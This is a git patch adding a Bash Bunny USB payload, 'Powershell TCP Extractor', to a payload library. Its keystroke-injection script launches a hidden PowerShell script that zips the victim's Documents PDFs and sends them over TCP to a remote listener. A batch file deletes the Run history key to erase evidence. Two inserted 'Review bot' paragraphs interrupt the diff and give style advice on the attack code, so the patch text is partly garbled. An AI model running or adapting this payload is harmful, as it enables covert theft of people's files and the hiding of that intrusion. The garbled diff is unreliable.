From fc1d812d961b70fafeff52b45abc8dabaa841996 Mon Sep 17 00:00:00 2001
From: SirLurkSalot
Date: Thu, 6 Apr 2017 23:49:35 -0500
Subject: [PATCH] Added PowershellTCPExtractor (#144)
---
 .../Powershell_TCP_Extractor/copyMoveData.ps1 | 34 +++++++++++++++++++
 .../library/Powershell_TCP_Extractor/d.cmd | 10 ++++++
 .../Powershell_TCP_Extractor/payload.txt | 21 ++++++++++++
 .../Powershell_TCP_Extractor/readme.md | 24 +++++++++++++
 4 files changed, 89 insertions(+)
 create mode 100644 payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1
 create mode 100644 payloads/library/Powershell_TCP_Extractor/d.cmd
 create mode 100644 payloads/library/Powershell_TCP_Extractor/payload.txt
 create mode 100644 payloads/library/Powershell_TCP_Extractor/readme.md
diff --git a/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1 b/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1
new file mode 100644
index 00000000..151d5232
--- /dev/null
+++ b/payloads/library/Powershell_TCP_Extractor/copyMoveData.ps1
@@ -0,0 +1,34 @@
+#edit ip and port of your listener... listener is on the machine you want to send data to... I use netcat as listener... (example command on kali.. [nc -l -p 54321 > out.file])
+[int] $Port = 54321
+$IP = "192.168.222.63"
+#edit this to specify your target
+$rootFolder = "$ENV:UserProfile\Documents"
+#edit include to specify filetypes...(*.doc*,*.txt,*.jpg) whatevs...
+$files = Get-ChildItem -Path $rootFolder -Include *.pdf -Recurse
+
+#only edit under this if you know what you are doing
+#temp location to perform file copy and zip
+$tempFolderRoot = $env:APPDATA
+$tempFolderFinal = $tempFolderRoot+"\"+$env:UserName+"-Docs"
+New-Item -ItemType directory -Path $tempFolderFinal -Force
+foreach($file in $files)
+{Copy-Item "$file" -destination $tempFolderFinal}
+$CompressionToUse = [System.IO.Compression.CompressionLevel]::Fastest
+$IncludeBaseFolder = $false
+$zipTo = "{0}\{1}.zip" -f $tempFolderRoot,"ZIPPED"
+[Reflection.Assembly]::LoadWithPartialName( "System.IO.Compression.FileSystem" )
+[System.IO.Compression.ZipFile]::CreateFromDirectory($tempFolderFinal, $ZipTo, $CompressionToUse, $IncludeBaseFolder)
+$Address = [system.net.IPAddress]::Parse($IP)
+$socket = new-object System.Net.Sockets.TcpClient
+$socket.connect($Address, $port)
+$stream = $socket.GetStream()
+$file = Get-Item $Env:APPDATA\ZIPPED.zip
+$fileData = [IO.File]::ReadAllBytes($file)
+$stream.Write($fileData, 0, $fileData.Length)
+$stream.Close()
+$Socket.Close()
+
+#clean up temp files
+Remove-Item $tempFolderFinal -RECURSE
+Remove-Item $Env:APPDATA\ZIPPED.zip
+
\ No newline at end of file
diff --git a/payloads/library/Powershell_TCP_Extractor/d.cmd b/payloads/library/Powershell_TCP_Extractor/d.cmd
new file mode 100644
index 00000000..782f0de8
--- /dev/null
+++ b/payloads/library/Powershell_TCP_Extractor/d.cmd
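Review bot: Variable names in this script are used with inconsistent casing: `$zipTo` is assigned but `$ZipTo` is passed to CreateFromDirectory, `$Port` is declared but `$port` is used in the connect call, and `$socket` is closed as `$Socket`. PowerShell resolves variable names case-insensitively, so nothing breaks, but it reads as though three extra variables were in play. The zip path is also spelled twice, once through `$zipTo` and again as the literal `$Env:APPDATA\ZIPPED.zip` on the Get-Item and Remove-Item lines, which is the kind of duplication that drifts when one copy is edited. Using one spelling per variable throughout, e.g. `$socket.connect($Address, $Port)` and `$socket.Close()`, would make the script read as a single consistent unit.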
@@ -0,0 +1,10 @@
+@echo off
+
+Rem run powershell script with bypass,nologo, and hidden flag
+Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
+
+REM Delete registry key storing Run dialog history...to clean up evidence
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+@cls
+@exit
\ No newline at end of file
diff --git a/payloads/library/Powershell_TCP_Extractor/payload.txt b/payloads/library/Powershell_TCP_Extractor/payload.txt
new file mode 100644
index 00000000..b0ccbae6
--- /dev/null
+++ b/payloads/library/Powershell_TCP_Extractor/payload.txt
@@ -0,0 +1,21 @@
+#!/bin/bash
+#
+# Title: Powershell Extractor
+# Author: $irLurk$alot
+# Version: 1.0
+# Target: Windows
+#
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn runs powershell script to copy move and extract data.
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R 100
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+LED R B 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+LED R G B
diff --git a/payloads/library/Powershell_TCP_Extractor/readme.md b/payloads/library/Powershell_TCP_Extractor/readme.md
new file mode 100644
index 00000000..be0d5ad7
--- /dev/null
+++ b/payloads/library/Powershell_TCP_Extractor/readme.md
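Review bot: On the `Start "" powershell.exe ...` line, `%~dp0` already expands with a trailing backslash, so `%~dp0\copyMoveData.ps1` produces a doubled path separator. Windows tolerates the doubled separator, so this is a matter of style rather than behaviour, but the conventional spelling is `%~dp0copyMoveData.ps1`. The two comment lines also mix `Rem` and `REM`; picking one casing keeps the file consistent.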
@@ -0,0 +1,24 @@
+# Powershell TCP extractor for Bash Bunnys
+
+* Author: $irLurk$alot
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine
+
+## Configuration
+The payload copies target to %APPDATA%, change this to wherever you like by editing powershell script,
+it then zips data and sends data to listener on a remote machine, also specified in powershell script.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Red | Attack Setup |
+| Purple | Attack Execution |
+| White | Attack Complete (safe to remove Bunny) |
+| | Script will continue to run and transmit |
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")